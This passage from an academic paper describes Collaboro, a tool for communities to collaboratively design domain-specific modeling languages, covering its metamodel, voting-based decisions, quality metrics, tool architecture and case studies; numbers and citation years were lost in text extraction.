metamodel, which is shown in fig. , allows representing both static (e.g., change proposals) and dynamic (e.g., voting) aspects of the collaboration. being the core of our collaborative approach, we refer to this metamodel as the collaboro metamodel. static aspects similarly to how version control systems track source code, collaboro also allows representing different versions of a dsml. the versionhistory metaclass represents the set of versions (version metaclass) through which the collaboration evolves. there is always a main version history set as trunk (type attribute in versionhistory metaclass), which keeps the baseline of the collaborations about the language under development. other version histories (similar to branches) can be forked when necessary to isolate the collaboration about concrete parts of the language. 
different version histories can be merged into a new one (or the trunk). figure core elements of the collaboro metamodel. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ language evolution is the consequence of collaborations (collaboration metaclass). collaboro supports three types of collaborations: change proposals (proposal metaclass), solutions proposals (solution metaclass) and comments (comment metaclass). a collaboration is proposed by a user (proposedby reference) and includes an explanation (rationale attribute). a change proposal describes which language feature should be modified and contains some meta information (e.g., priority or tags). change proposals are linked to the set of solutions proposed by the community to be discussed for agreement. it is also possible to specify possible conflicts between similar proposals (e.g., the acceptance of one proposal can involve rejecting others) with the conflictwith reference. solution proposals are the answer to change proposals and describe how the language should be modified to incorporate the new features. each solution definition involves a set of add/update/delete changes on the elements of the dsml (change hierarchy). change links the collaboration metamodel with the dsml under discussion (syntaxelement metaclass), which can refer to the abstract syntax (abstractsyn taxelement metaclass) or the concrete syntax (concretesyntaxelement metaclass). the latter links (maps reference) to the abstract element to which the notation is defined. both abstractsyntaxelement and concretesyntaxelement metaclasses have a reference linking to the element which is being changed (element reference). changes in the abstract syntax are expressed in terms of the metamodeling language (i.e., emodelelement elements, which is the interface implemented by every element in the ecore metamodel) while changes in the concrete syntax are expressed in terms of elements conforming to the notation metamodel presented before. the change metaclass has a reference to the container element affected by the change (referredelement reference) and the element to change (target reference). thereby, in the case of add and delete metaclasses, referredelement reference refers to the element to which we want to add/delete a “child” element whereas target refers to the actual element to be added/deleted. in the case of the update metaclass, referredelement reference refers to the element which contains the element to be updated (e.g., a metaclass) whereas target reference refers to the new version of the element being updated (e.g., a new version for an attribute). the additional source attribute indicates the element to be updated (e.g., the attribute which is being updated). dynamic aspects during the process, community members vote collaboration elements, thus allowing to reach agreements. votes (vote metaclass) indicate whether the user (votedby reference) agrees or not with a collaboration (agreement attribute). a vote against a collaboration usually includes a comment explaining the reason of the disagreement (comment reference of vote metaclass). this comment can then be voted itself and if it is accepted by the community, the proponent of the voted proposal/solution should take such comment into account (the included attribute of comment metaclass records this fact). cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ the acceptance of a proposal means that the community agrees that the requested change is necessary (accepted attribute). for each proposal we can have several solutions but in the end one of them will be selected (selected reference of the proposal metaclass) and its changes applied to the dsml definition. part of this data (like the accepted and selected properties) is automatically filled by the decision engine analyzing and resolving the collaboration. making decisions community votes are used to decide which collaborations are accepted and must be incorporated into the language. collaboration models include all the necessary information, thus allowing the automation of the decision process (i.e., approval of change proposals and selection of solutions). a decision engine can therefore apply resolution strategies (e.g., unanimous agreement, majority agreement, etc.) to deduce (and apply) the collaborations accepted by the community. as commented before, most times it is necessary to have the role of the community manager to trigger the decision process and solve possible decision locks. example as example of collaboration, we show in fig. the collaboration model which would be obtained when using collaboro to model the example discussed previously. the figure is divided in several parts according to the collaboration steps enumerated previously. for the sake of clarity, references to user metaclass instances have been represented as figure the collaboration model representing the collaborations arisen in the baggage claim dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ string-based attributes and the rationale attribute is not shown. the figure shows the collaboration as an instance of the collaboro metamodel. at the tool level, we offer a user-friendly interface enabling all kinds of users to easily contribute and vote during the discussion process while the tool updates the collaboration model behind the scenes in response to the user events. part of fig. shows the collaboration model just after end-user makes the request. it includes a new proposal instance that is voted positively by the rest of the users and therefore accepted (see part ). then, a new solution is proposed by developer (see part ), which involves enriching the conveyor metaclass with a float attribute in addition to define the concrete syntax. however, this solution is not accepted by all the community members: end-user does not agree and explains his disagreement (see part ). since the comment is accepted (see part ), developer updates the solution to incorporate the community recommendations (see part ). note that the elements describing the model changes in parts and are mutually exclusive. moreover, the included attribute of the comment element in part will be activated as a consequence of the solution update. once everybody agrees on the improved solution, it is selected as the final one for the proposal (see the selected reference). now the development team can modify the dsml tooling knowing that the community needs such change and agrees on how it must be done. moreover, the rationale of the change will be tracked by the collaboration model (from which an explanation in natural language could be generated, if needed), which will allow community members to know why the conveyor metaclass was changed. 
metric-based recommender when developing dsmls, several quality issues regarding the abstract and concrete syntaxes can be overlooked during the collaboration. while developers are maybe the main responsibles for checking that the language is being developed properly, it is important to note that these issues may arise from both developers (e.g., they can forget defining how some concepts are represented in the notation) and end-users (e.g., they may miss that the notation is becoming too complicated for them to later being able to manage complex models). we propose to help both developers and end-users to develop better dsmls by means of a recommender engine which checks the language under development to spot possible issues and improvements. the recommender applies a set of metrics on the dsml to check its quality, in particular, to ensure that the resulting language is expressive, effective and accurate enough to be well-understood by the end-users. metrics can target both the abstract and concrete syntaxes of a dsml. concrete syntax metrics can in turn target either textual or graphical syntaxes. while several metrics for abstract and textual concrete syntaxes have been devised in previous works (cho & gray, ; aguilera, gómez & olivé, ; power & malloy, ; črepinšek et al., ), the definition and implementation of metrics for graphical concrete syntaxes is still an emerging working area. thus, in this work, we explore how metrics for abstract and concrete cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ syntaxes can be implemented in our approach, but we mainly focus on those ones regarding graphical concrete syntaxes. abstract syntax metrics the abstract syntax of a dsml is defined by a metamodel, as commented before. while the identification of proper dsml constructs (i.e., concepts and relationships) usually relies on the domain experts, identifying and solving design issues (e.g., creating hierarchies to promote extensibility or identifying patterns such as factoring attributes) is normally performed by the developers. thus, to provide consistent solutions for recurring metamodel design issues, some metrics applied to abstract syntax metamodels may offer key insights on its quality. there are currently several works providing a set of metrics for metamodels as well as for uml class diagrams that can be applied in this context (e.g., cho & gray, ; aguilera, gómez & olivé, ). as a proof of concept to evaluate the abstract syntax of dsmls in our approach, we implemented a couple of metrics that validate hierarchical structures in metamodels (inspired by aguilera, gómez & olivé ( )). thus, we consider that such structures are invalid whether either there is only one derived class or whether an inheritage is redundant (i.e., already covered by a chain of inheritage). as our approach relies on ecore, other metrics defined for this metamodeling language could be easily plugged in by using the extension mechanism provided, as we will show afterwards. concrete syntax metrics the concrete syntax of a dsml can be textual or graphical (or hybrid). as textual dsmls are usually defined by means of a grammar-based approach, which is also the case for gpls, existing support for evaluating the quality of gpls could be applied (e.g., power & malloy ( ) and črepinšek et al. ( )). 
apart from this gpl-related support, the current support to assess the quality of the concrete syntaxes in the dsml field is pretty limited. thus, in this paper, we apply a unifying approach to check the quality of any dsml concrete syntax (i.e., textual and/or graphical). with this purpose, we employ the set of metrics based on the cognitive dimensions framework (green, ), later formalized by moody ( ), where metrics are presented according to nine principles, namely: cognitive integration, cognitive fit, manageable complexity, perceptual discriminality, semiotic clarity, dual coding, graphic economy, visual expressiveness and semantic transparency. several works have applied them to specific dsmls (e.g., genon, heymans & amyot ( b) or le pallec & dupuy-chessa ( )). nevertheless, none of them has tried to implement such metrics in a way that can be applied generically to any dsml. as collaboro provides the required infrastructure to represent concrete syntax at a technology-agnostic level, we propose to define a set of dsml metrics adapted from moody’s principles for designing cognitively effective notations. in the following, we present how we addressed five of the nine principles to be applied to our metamodels, and we justify why the rest of the principles were discarded. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ semiotic clarity. this principle refers to the need of having a one-to-one correspondence between notation symbols and their corresponding concepts, thus maximizing precision and promoting expressiveness. we can identify four metrics according to the possible situations that could appear: ( ) symbol deficit, when a concept is not represented by a notation symbol (sometimes this situation could be evaluated positively as to avoid having too many symbols and losing visual expressiveness); ( ) symbol excess, when a notation symbol does not represent any concept; ( ) symbol redundancy, when multiple notation symbols can be used to represent a single concept; and ( ) symbol overload, when multiple concepts are represented by the same notation symbol. in collaboro, these metrics can be computed by analyzing the mapping between the abstract syntax elements and the notation model elements of the dsml (i.e., analyzing the maps reference in the concretesyntaxelement element). on the one hand, the analysis of the abstract syntax consists on a kind of flattening process where all the concepts are enriched to include the attributes and references inherited from their ancestors. the aim is to identify the dsmls elements (i.e., concept, attribute or reference) for which a concrete syntax element has to be defined. on the other hand, the analysis of the concrete syntax focuses on the discovery of symbols. when a symbol uses multiples graphical elements to be represented (e.g., using nested composite elements or syntaxof elements), they are aggregated. the result of this analysis is stored in a map that links every abstract syntax element with the corresponding concrete syntax element, thus facilitating the calculation of the previous metrics. this map will be also used in the computation of the remainder metrics. visual expressiveness. this principle refers to the number of visual variables used in the notation of a dsml. visual variables define the dimensions that can be used to create notation symbols (e.g., shape, size, color, etc.). 
thus, to promote its visual expressivenes, a language should use the full range and capacities of visual variables. to assess this principle, we define a metric which analyzes how visual variables are used in a dsml. the metric leverages on the previous map data structure and enriches it to include the main visual variables used in each symbol. according to the current support for visual variables of the notation metamodel (recall graphicalelement metaclass attributes), these variables include: size (height and width attributes), color (fill and stroke attributes) and shape (subclasses of graphicalelement metaclass). the metric checks the range of visual variables used in the symbols of the dsml and notifies the community when the notation should use more visual variables and/or more values of a specific visual variable to cover the full range. graphic economy. this principle states that the number of notation symbols should be cognitively manageable. note that there is not an objective rule to measure the complexity of notation elements (e.g., expert users may cognitively manage more symbols than a novice). there is the six symbol rule (miller, ) which states that there should be no more than six notation symbols if only a single visual variable is used. we therefore devised a metric based on this rule to assess the level of graphic economy in a dsml. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ perceptual discriminality. this principle states that different symbols should be clearly distinguishable from each other. discriminality is primarily determined by the visual distance between symbols, that is, the number of visual variables on which they differ and the size of these differences. this principle also states that every symbol should have at least one unique value for each visual variable used (e.g., unique colors for each symbol). thus, to assess the perceptual discriminality, we define a metric which also relies on the previous map data structure, compares each pair of symbols and calculates the visual distance between them according to the supported visual variables (i.e., number of different visual variables per pair of symbols). by default, the metric notifies the community when the average distance is lower than one, but it can be parameterized. dual coding. this principle suggests that using text and graphics together conveys the information in a more effective way. textual encoding should be then used in addition of graphical encoding to improve understanding. however, textual encoding should not be the only way to distinguish between symbols. we defined a metric that checks whether each symbol uses text and graphics elements, thus promoting dual coding. to this aim, we leverage on our notation metamodel, which allows to attach textual elements to symbols by employing label elements that contain textualelement elements. this metric notifies the community when more than a half of the symbols are not using both text and graphics. the remaining four moody’s principles were not addressed due to the reasons described below. semiotic transparency. this principle states that a notation symbol should suggest its meaning. this principle is difficult to evaluate as it relies on many parameters such as context and good practices in the specificdomain. furthermore, as the meaning of a representation is subjective, an automatic verification of this principle would be difficult to reach. 
complexity management. this principle refers to the ability of the notation to represent information without overloading the human mind (e.g., providing hierarchical notations). although this could be addressed in the notation model by providing mechanisms for modularization and hierarchical structuring, we believe that assessing this principle strongly depends on the profile and background of the dsml end-users and it is therefore hard to measure. cognitive integration. this principle states that the visual notation should include explicit mechanisms to support integration of information from different diagrams. in this sense, this principle refers to the results of composing different dsmls, which is not an scenario targeted by our approach. cognitive fit. this principle promotes the fact that different representations of information are suitable for different tasks and audiences (e.g., providing different concrete syntaxes for the same abstract syntax). like in the complexity management principle, assessing the cognitive fit of the notations of a dsml is directly related to the expertise of the different communities using the language, which is hard to measure with an automatic evaluation. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ recommending changes the results of the previously shown metrics provide the community developing a dsml with an important feedback to address potential improvements. in collaboro, the dsml development process incorporates a recommender that plays the role of a user in the collaborationprocess.this“recommenderuser”can checkthedifferentversionsofthedsml under development according to the previously shown metrics and propose new changes identifying the weak points to be discussed in the community. metrics can be deactivated if wished and can be given different relevance values that can also be used to sum up theresults to calculate a general value assessing the quality of the dsml under development. example in this section, we will show an example of the metrics regarding visual expressiveness and perceptual discriminatity for the baggage claim dsml. for the sake of illustration purposes, we describe these metrics on an alternative graphical syntax to the dsml, where the flight concept is represented as a poligon with the shape of an airplane, the conveyor concept is represented as a black filled-rectangle and the claims reference is represented as a line. the computation of these metrics are specially tailored to the visual variables supported by our notation metamodel. table illustrates how these two metrics are calculated. as can be seen, visual expressiveness results assess the number of different values used for each visual variable. thus, there are three out of five values for the shape dimension, two different values for the size dimension and two different values for the color dimension. on the other hand, the visual distance is calculated for each pair of symbols and measures the number of different visual variables between them. for instance, the black-filled rectangle differs in two visual variables (i.e., color and shape) with the airplane polygon; and all the supported visual variables with regard to the line. 
these results reveal a good visual expressiveness (good values for shape and size visual variables while the color range is appropriate for the number of symbols) and perceptual discriminality (visual distance is in average more than , where the highest value is ) therefore validating this graphical notation proposal. table example of visual expressiveness and perceptual discriminality for the baggage claim dsml. ve shape polygon rectangle line / size h: h: h: w: w: w: color fill:white fill:black fill:white / stroke:black stroke:black stroke:black pd visual distance visual distance visual distance b: a: a: c: c: b: note: ve, visual expressiveness; pd, perceptual discriminability. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ collaborative modeling in this section we will show how our approach could be easily adapted to support collaborative modeling. this adaptation is depicted in fig. . unlike the fig. , where we illustrated the process for the collaborative development of dsmls, in this case the community evaluates and discuss changes about the model being developed and not the metamodel. thus, once there is a first version of the model and a set of examples (step ), the community discusses how to improve the models (step ). the discussion arises changes and improvements, that have to be voted and eventually incorporated in the model (step ). discussion and decisions are recorded (see collaboration history), thus keeping track of the modifications performed in the model. to support this development process, the modifications to perform in the original collaboro metamodel are very small. figure shows the new metamodel to track the collaboration. as can be seen, the only changed element is the syntaxelement, which now has to refer to the main (i.e. root) metaclass of the modeling language being used to link the model elements with their metamodel definition. for instance, by default, the figure includes the element namedelement from uml, thus illustrating how collaboro could be used for the collaborative development of uml models. other languages could be supported following this same approach. tool support since the very first implementation of collaboro was released, the tool support has evolved to integrate the full set of features described in this paper . the new architecture of the developed tool is illustrated in fig. . the main functionalities of our approach are implemented by the backend (see collaboro backend), which includes specific collaborations end-users developers collaboration history evaluates<< << ch an ge s << << isstored<< << decision engine community manager drives<< << updates<< << model model instances instanceof<< << figure collaborative modeling. the tool is available at http://som- research.github.io/collaboro cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://som-research.github.io/collaboro http://som-research.github.io/collaboro http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ components for modeling both the dsml elements and the collaborations (see modeling support), rendering the notation examples (see notation renderer) making decisions (see decision engine), and recommending changes (see recommender system). 
as front-end for collaboro, we have developed two alternatives: ( ) a web-based front-end, which gives access to the collaboration infrastructure from any web browser; and ( ) an eclipse-based front-end, which extends the platformwithviews and editors facilitating the collaboration. next, we describe in detail each component of this architecture. collaboro backend this component provides the basic functionality to develop collaborative dsmls as explained in this paper. collaboro relies on the emf framework (steinberg et al., ) (the standard de facto modeling framework nowadays) to manage the models required during the development process. in the following, we describe the main elements of this component. proposal accepted : boolean solution comment included : boolean sols version id : string proposals collaboration id : string rationale : string user id : string proposedby metainfo priority value : int tagbased tag value : string change referredelement target add update delete vote agreement : boolean votedby selected comment metainfo ..* ..* .. .. .. votes ..* comments ..* .. .. changes ..* .. .. ..* tags source .. ..* .. .. .. .. .. .. .. .. .. ..* ..* .. collaborations votes .. versionhistory type : historytype .. .. versions historytype trunk branch previous .. .. namedelement <<from uml package>> ..* conflictwith ..* figure core elements of the adapted collaboro metamodel. figure architecture of collaboro tool support. cánovas izquierdo and cabot ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ modeling support collaboro provides support for managing models representing the abstract and concrete syntaxes, and the collaboration models. we implemented the metamodels described in previous sections as ecore models (the metamodeling language used in emf) and provided the required api. to support concurrent collaboration the tool can be configured to store the models in a cdo (http://www.eclipse.org/cdo) model repository. notation renderer the tool incorporates a generator which automatically creates the graphical/textual representation of the dsml example models. this component enables the lightweight creation of svg (svg, ) images from notation models to help users “see” how the notation they are discussing will look like when used to define models with that dsml. the generator analyzes each example model element, locates its abstract/concrete syntax elements and interprets the concrete syntax definition to render its textual/ graphical representation. graphicalelement and textualelement concrete syntax elements indicate the graphical or textual representation to be applied (e.g., a figure or a text field), while composite and syntaxof concrete syntax elements are used for layout and composite elements. regarding the layout of the generated graphical/textual representation, on the one hand, a block-based notation is automatically applied for textual languages, where each new composite concrete syntax element (and its contained elements) is indented. on the other hand, graphical notations are rendered following a horizontal layout, thus elements are arranged from left to right as the example model is analyzed. note that symbols acting as connectors between concepts are detected by means of the maps reference in concretesyntaxelement, thus allowing the renderer to know what concepts (and their corresponding symbols) are used as source/target elements. 
decision engine

this component is responsible for updating the dynamic part of the collaboration models (recall the support for votes and decisions). the current support of the tool implements a total agreement strategy to infer community agreements from the voting information of the collaboration models.

recommender system

this component provides the required infrastructure to calculate both abstract and concrete syntax metrics in order to ensure their quality. the recommender is executed on demand by the community manager. the current support of the tool implements metrics to evaluate quality issues of the concrete graphical syntax. new metrics can be plugged in by extending the java elements presented in fig. . the entry point is the metric factory class, which is created for each dsml and is responsible for providing the list of available metrics. metrics have a name, a description, a dimension (e.g., each moody's principle), an activation, a priority level and an acceptance ratio. the acceptance ratio allows specifying the maximum number of syntax elements that can be wrong (e.g., not conforming to the metric). every metric also includes an execute() method for the recommender to compute it. this function returns a list of metricresults describing the assessment of the metric. metric results include a status (i.e., measured in three levels), a reason describing the assessment in natural language and a ratio of fulfillment for the metric. metric results also include a list of referredelements pointing to those abstract or concrete syntax elements not conforming with the metrics being calculated, thus helping developers to spot the dsml elements not satisfying each metric (if any). (figure: core elements of the recommender engine: metric (name, description, dimension, acceptanceratio, isactive, priority, execute(): list<metricresult>), specialized into abstractsyntaxmetric and concretesyntaxmetric (with graphical and textual variants); metricfactory (abstractsyntax: epackage, concretesyntax: definition, getabstractsyntaxmetrics(), getconcretesyntaxmetrics()); metricresult (status: metricresultstatus, reason: string, ratio: float) pointing to referredelement (name: string, reason: referredelementreason) with abstract and concrete variants; enumerations metricpriority {high, normal, low}, referredelementreason {missing, wrong} and metricresultstatus {good, middle, bad}.)

eclipse plugin

we have developed an eclipse plugin implementing the collaboro process and dsml. the plugin provides a set of new eclipse views and editors to facilitate the collaboration, which can be considered a kind of concrete syntax of collaboro itself for non-expert users. via these editors users can propose changes (to add both new abstract syntax and concrete syntax definitions to existing abstract elements) on the collaboro model that, once accepted, will update the abstract and concrete syntax models and link them together according to the selected solution. figure a includes a snapshot of the environment showing the last step of the collaboration described in previous sections. in particular, the version view lists the collaboration elements (i.e., proposals, solutions and comments) of the current version of the collaboration model. the collaboration view shows the detailed information of the selected collaboration element in the version view and a tree-based editor to indicate the changes to discuss for that element, as shown in fig. a. finally, the notation view uses the notation generator to render a full example model of the language. for instance, the notation views in figs. b and c show the notation (i.e., in textual and graphical forms, respectively) for an example model, which allowed detecting the missing attribute regarding the conveyor capacity. (figure: (a) snapshot of the collaboro eclipse plugin; the notation view rendering the (b) textual and (c) graphical concrete syntaxes for a model.)

web-based front-end

the developed web support includes two components: ( ) the server-side part, which offers a set of services to access the main functionalities of collaboro; and the client-side part, which allows both end-users and developers to take part in the dsml development process from their browsers. the server-side component has been developed as a java web application which uses a set of servlets providing the required services. on the other hand, the client-side component has been developed as an angularjs-enabled website. figures and show two snapshots of the developed website. as can be seen in fig. , the website follows an arrangement similar to the one used in the eclipse plugin. thus, on top, there are two sections showing the current status of ( ) the abstract syntax of the dsml on the left and ( ) several model examples rendered with the concrete syntax definition of the dsml on the right (both sections are zoom-enabled). these sections include several pictures that can be navigated by the user (e.g., it is possible to evaluate the different example models rendered). at the bottom of the website, there are two more sections aimed at managing the collaborations, in particular, ( ) a tree including all the collaboration elements on the left and ( ) a details view on the right which shows the information of a collaboration once it is selected in the tree. furthermore, the tree view also includes buttons to create, edit and delete collaborations. (figure: snapshot of the collaboro web client.) the website also includes a left menu bar which allows the user to navigate through the different versions of the dsml as well as indicate some information about the recommender system status. additionally, the user can quickly see the number of issues detected by the recommender, configure the metrics (see fig. ) that have to be executed and perform the metric execution to incorporate the change proposals into the collaboration. (figure: snapshot of a subset of supported metrics.)
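to illustrate how a new metric could be plugged into the recommender described above, the sketch below extends the metric hierarchy from the figure. the class and enumeration names follow that figure, but the exact constructor and accessor signatures are assumptions, not collaboro's published api, and the threshold used is only illustrative.

```java
// Illustrative sketch only: a custom concrete-syntax metric for the recommender.
// Metric, MetricResult, MetricPriority and MetricResultStatus follow the figure,
// but their Java signatures (and getConcreteSyntax().getSymbols()) are assumed.
import java.util.ArrayList;
import java.util.List;

public class SymbolCountMetric extends ConcreteSyntaxGraphicalMetric {

    public SymbolCountMetric() {
        super("symbol-count",                                            // name
              "Checks that the notation does not use too many symbols",  // description
              "Graphic economy",                                         // dimension (a Moody principle)
              /* acceptanceRatio = */ 0,
              /* isActive        = */ true,
              MetricPriority.NORMAL);
    }

    @Override
    public List<MetricResult> execute() {
        List<MetricResult> results = new ArrayList<>();
        int symbols = getConcreteSyntax().getSymbols().size();  // assumed accessor
        if (symbols > 6) {                                       // illustrative threshold
            results.add(new MetricResult(
                MetricResultStatus.BAD,
                "The notation defines " + symbols + " symbols; consider reducing graphic complexity",
                6.0f / symbols));
        } else {
            results.add(new MetricResult(MetricResultStatus.GOOD, "Symbol count is acceptable", 1.0f));
        }
        return results;
    }
}
```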
application scenarios

in this section, we report the use of collaboro in two types of scenarios: ( ) the creation of new dsmls, based on two different case studies; and ( ) the extension of existing dsmls, where we describe our experience in one case study. we also mention some lessons learned in the process.

developing new dsmls

we used collaboro in the creation of two new dsmls: ( ) a textual dsml to define workflows and ( ) three metamodels to represent code hosting platforms in the context of a modernization process. we explain each case in the following.

creating a textual dsml

collaboro was used in the development of a new dsml for modisco (http://eclipse.org/modisco), an eclipse project aimed at defining a group of tools for model-driven reverse engineering (mdre) processes. the goal of this new dsml is to facilitate the development of mdre workflows that chain several atomic reverse engineering tasks to extract the model/s of a running system. at the moment, the only way to define an mdre workflow is by using an interactive wizard. modisco users have been asking for a specific language to do the same in a more direct way, i.e., without having to go through the wizard. some years ago an initial attempt to create such a language was eventually abandoned but, to simplify the case study, we reused the metamodel that was proposed at the time to kickstart the process. five researchers of the team followed our collaborative process to complete/improve the abstract syntax of the dsml and create from scratch a concrete syntax for it. two of the members were part of the modisco development team, so they took the role of developers in the process, while the other three were only users of modisco, so they adopted the role of end-users in the process. one of the members was in a different country during the collaboration, so only asynchronous communication was possible. the collaboration took two weeks and resulted in two new versions of the mdre workflow language being released. the first version was mainly focused on polishing the abstract syntax, whereas the second one paid more attention to the concrete syntax (this was not enforced by us but came out naturally). the collaboration regarding the abstract syntax involved changes in concepts and reference cardinalities, while regarding the concrete syntax, the community chose to go for a textual notation and mainly discussed the best keywords or style to be used for it.

defining metamodels

we have also applied collaboro for defining a set of metamodels used in a model-driven re-engineering process (i.e., only the abstract syntax of the dsml was part of the experiment since the models were to be automatically created during the reverse engineering process). in particular, the process was intended to provide support for migrating google code to github projects, thus requiring the corresponding platform-specific model (psm) metamodels for both platforms, plus a platform-independent model (pim) metamodel to represent such projects at a high level of abstraction (following the typical terminology defined by the model-driven architecture (mda) approach from the omg (object management group, a)).
as the developers were distributed across different geographical locations, we decided to use collaboro to create the required psm and pim metamodels. six geographically dispersed researchers (i.e., the participants were part of three research groups, making three groups composed of , and researchers) collaborated in the definition of the metamodels. to kickstart the collaboration, one of the teams created a first version of each metamodel. as the collaboration was focused on defining only the abstract syntax of the language, there was no need to create a notation model, and therefore the set of examples was rendered following a class-like diagram style. the collaboration took three weeks and resulted in two versions for each one of the psm metamodels and only one version for the pim metamodel, since there the agreement was faster.

extending an existing dsml

more recently, we were contacted by a community member of the architecture analysis & design language (aadl) (http://www.aadl.info), one of the lead developers in charge of defining an extension to the language. aadl is an architecture description language used in the embedded and real-time systems field. it is a textual dsml with large abstract and concrete syntaxes. the abstract syntax contains more than concepts and the concrete syntax is composed of more than elements (including keywords and tokens). the language was being extended to incorporate support for behavior specification. this extension, called the aadl behavior annex (aadl-ba) (http://penelope.enst.fr/aadl/wiki/projects#aadl-ba-fronten), was being defined as a plugin enriching both the abstract and concrete syntaxes. at the time, the definition of the extension was taken care of by a standardization committee open to new contributions. change proposals were informally managed by in-person voting (i.e., raising hands in a meeting) or online ballots. later, the documentation of the change proposal was spread out in a document, presentation or online wiki documentation. as explained to us by this lead developer, this process made tracking modifications in the language, as well as the corresponding argumentation, very hard, and he proposed to use collaboro to manage the development of the extension for aadl. as a first step, we created a fake aadl project so that this person could play around with the tool and assess its usefulness for the aadl community. the feedback was that the tool would be very useful for the project at hand if we were able to deal with some technical challenges linked to the setting used by the project so far. in particular, to be able to use collaboro for managing the aadl-ba language definition process we needed to import: ( ) the previous discussions stored in the wiki-based platform and ( ) the current concrete syntaxes of the aadl and aadl-ba languages, defined in xtext and antlr respectively (the abstract syntax was already defined as an emf model so it could be directly imported into collaboro). it was also clear that, to simplify the use of the tool, we had to provide a web interface, since it would be too complex for the members of the aadl community to install an eclipse environment just for the purpose of discussing language issues.
in the end, time constraints prevented us from testing the tool with the aadl community at large (the aadl-ba committee meets at fixed dates and we did create a web-based interface but could not get a new version of the tool with all the scripts required to import the legacy data on time), but the private iterations with the aadl-ba developer and his validation and positive feedback helped us a lot to improve collaboro and learn more about the challenges of using collaboro as part of an ongoing language development effort. we are still in contact with this community and we will see if we can complete the test in the future or reach out to other similar standardization committees.

lessons learned

the development of the previous case studies provided us with some useful insights on the collaboro process that have since been integrated into our approach. for instance, in the first and second case studies, it turned out that conflicting proposals were frequent and therefore we added conflicting-relationship information explicitly to the collaboration metamodel, so that once one of the proposals was accepted we could automatically shut down the related ones. we also noted an intensive use of comments (easier to add) in comparison with proposals and solutions. this fact, together with the discussions on what should constitute a new version and when to end the discussions (e.g., what if there was unanimity but not everybody had voted, should we wait for that person? for how long?), helped us to realize the importance of an explicit community manager role in charge of making sure the collaboration is always fluid and there are no bottlenecks or deadlocks. during the development of the three case studies, concurrent access to the models turned out to be a must as well, since most of the time collaborations overlapped at some point. the experience gathered during the development of the first case study, where the collaboration was performed only in the eclipse-based plugin, and later the requirements of the second and third case studies, allowed us to provide a second front-end for the approach based on a web client. thus, the web-enabled support was crucial to allow all the developers to contribute and visualize how the metamodels evolved during the collaboration. in all the case studies the notation view allowed the participants to quickly validate the concrete syntax. this is especially important since for non-technical users it is easier to discuss at the concrete syntax level than at the abstract level. the only common complaint we got was regarding the limited support for voting (mainly raised in the first case study but also raised in the others), where participants reported that they would have preferred more options instead of just a boolean yes/no option. note that this would have a non-negligible impact on the decision algorithms, which would need to be adapted to consider the new voting options. we plan to incorporate extra support to define how to make decisions, in a similar way as proposed in cánovas izquierdo & cabot ( ).
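a minimal sketch of the conflict handling mentioned in the lessons learned is shown below, assuming a proposal type with a conflictwith relationship as in the collaboration metamodel; the accessors used are hypothetical and only illustrate the intended behavior.

```java
// Sketch of the conflict handling added after the first case studies: when a
// proposal is accepted, proposals linked to it through the conflictWith
// relationship are closed automatically. The Proposal type and its accessors
// are assumptions standing in for the corresponding Collaboro metamodel elements.
import java.util.List;

final class ConflictResolution {

    static void accept(Proposal accepted, List<Proposal> allProposals) {
        accepted.setAccepted(true);
        for (Proposal other : allProposals) {
            // shut down any open proposal that conflicts with the accepted one
            if (other != accepted && other.conflictsWith(accepted) && !other.isClosed()) {
                other.close("Superseded by accepted proposal " + accepted.getId());
            }
        }
    }
}
```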
related work

end-user involvement is a core feature of several software development methods (such as agile-based ones). the concept of community-driven development of a software product was introduced by hess, offenberg & pipek ( ), and other authors have studied this kind of collaboration as part of the requirements elicitation (mylopoulos, chung & yu, ), ontology development (leenheer, ; siorpaes, ) and modeling phases of the software (hildenbrand et al., ; lanubile et al., ; whitehead, ; rittgen, ), but none of them focuses on the dsml language design process, nor do they present the collaboration as a process of discussion, voting and argumentation from the beginning to the end of the language development process. end-user participation is also the core of user-centered design (norman & draper, ), initially focused on the design of user interfaces but lately applied to other domains (e.g., agile methodologies (hussain, slany & holzinger, ) or web development (troyer & leune, )). again, none of these approaches can be directly applied to the specification of a dsml. nevertheless, ideas from these papers have indeed influenced the collaboro process. regarding specific approaches around collaboration in dsml development, some works propose to derive a first dsml definition by means of user demonstrations (cho, gray & syriani, ; kuhrmann, ; sánchez cuadrado, de lara & guerra, ; lópez-fernández et al., ) or grammar inference techniques (javed et al., ; liu et al., ), where example models are analyzed to derive the metamodel of the language. however, these approaches do not include any discussion phase or validation of the generated metamodel with the end-users. in this sense, our approaches could complement each other: theirs could be used to create an initial metamodel from which to trigger the refinement process based on the discussions among the different users (cánovas izquierdo et al., ). subsets of our proposal can also be linked to: (i) specific tools for model versioning (e.g., the amor repository (http://www.modelversioning.org) and altmanninger, seidl & wimmer ( )) that have already proposed a taxonomy of metamodel changes; (ii) online collaboration (brosch et al., ; gallardo, bravo & redondo, ) promoting synchronous collaboration among developers; (iii) metamodel-centric language definition approaches (scheidgen, ; prinz, scheidgen & tveit, ) where the concrete syntax is considered at the same level as the abstract one; and (iv) collaboration protocols (gallardo et al., ). in all cases, collaboro extends the contributions of those tools with explicit collaboration and justification constructs, and provides as well the possibility of offline collaborations and a more formal representation of the interactions (e.g., voting system, explicit argumentation and rationale, traceability). the agreed dsml definition at the end of the collaboro process could then be the input to the complete dsml modeling environments aimed at by some of the tools mentioned above. 